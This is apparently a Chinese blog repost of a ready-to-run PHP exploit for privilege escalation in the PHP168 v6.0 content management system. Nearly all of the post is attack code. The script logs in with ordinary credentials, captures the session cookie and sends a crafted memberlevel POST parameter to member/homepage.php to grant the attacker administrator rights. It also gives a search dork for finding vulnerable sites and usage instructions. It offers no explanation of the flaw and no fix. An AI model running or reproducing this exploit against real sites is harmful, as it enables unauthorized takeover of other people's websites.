powered by php168 v6,Php168 v6 权限提升漏洞

最新推荐文章于 2023-07-23 16:51:38 发布

weixin_39940755

最新推荐文章于 2023-07-23 16:51:38 发布

阅读量244

点赞数

文章标签： powered by php168 v6

天天上班,好久没在论坛发贴了…

以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段

直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析:)

EXP:

#!/usr/bin/php

print_r('

+---------------------------------------------------------------------------+

Php168 v6.0 update user access exploit

by puret_t

mail: puretot at gmail dot com

team: http://www.wolvez.org

dork: "Powered by PHP168 V6.0"

+---------------------------------------------------------------------------+

');

/**

* works regardless of php.ini settings

if ($argc < 5) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path user pass

host: target server (ip/hostname)

path: path to php168

user: login username

pass: login password

Example:

php '.$argv[0].' localhost /php168/ ryat 123456

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$user = $argv[3];

$pass = $argv[4];

$resp = send();

preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie)

if (strpos(send(), 'puret_t') !== false)

exit("Expoilt Success!\nYou Are Admin Now!\n");

else

exit("Exploit Failed!\n");

else

exit("Exploit Failed!\n");

function rands($length = 8)

{

$hash = '';

$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';

$max = strlen($chars) - 1;

mt_srand((double)microtime() * 1000000);

for ($i = 0; $i < $length; $i++)

$hash .= $chars[mt_rand(0, $max)];

return $hash;

}

function send()

{

global $host, $path, $user, $pass, $cookie;

if ($cookie) {

$cookie[1] .= ';USR='.rands()."\t31\t\t";

$cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

$message = "POST ".$path."member/homepage.php?uid=$cookie[2] HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n";

$message .= "Cookie: ".$cookie[1]."\r\n\r\n";

$message .= $cmd;

} else {

$cmd = "username=$user&password=$pass&step=2";

$message = "POST ".$path."do/login.php HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

}

$fp = fsockopen($host, 80);

fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))

$resp .= fread($fp, 1024);

return $resp;

}

weixin_39940755

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
powered by php168 v6,Php168 v6 权限提升漏洞

天天上班,好久没在论坛发贴了…以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析:)EXP:#!/usr/bin/phpprint_r('+---------------------------------------------------------------------------+Php1...
复制链接

扫一扫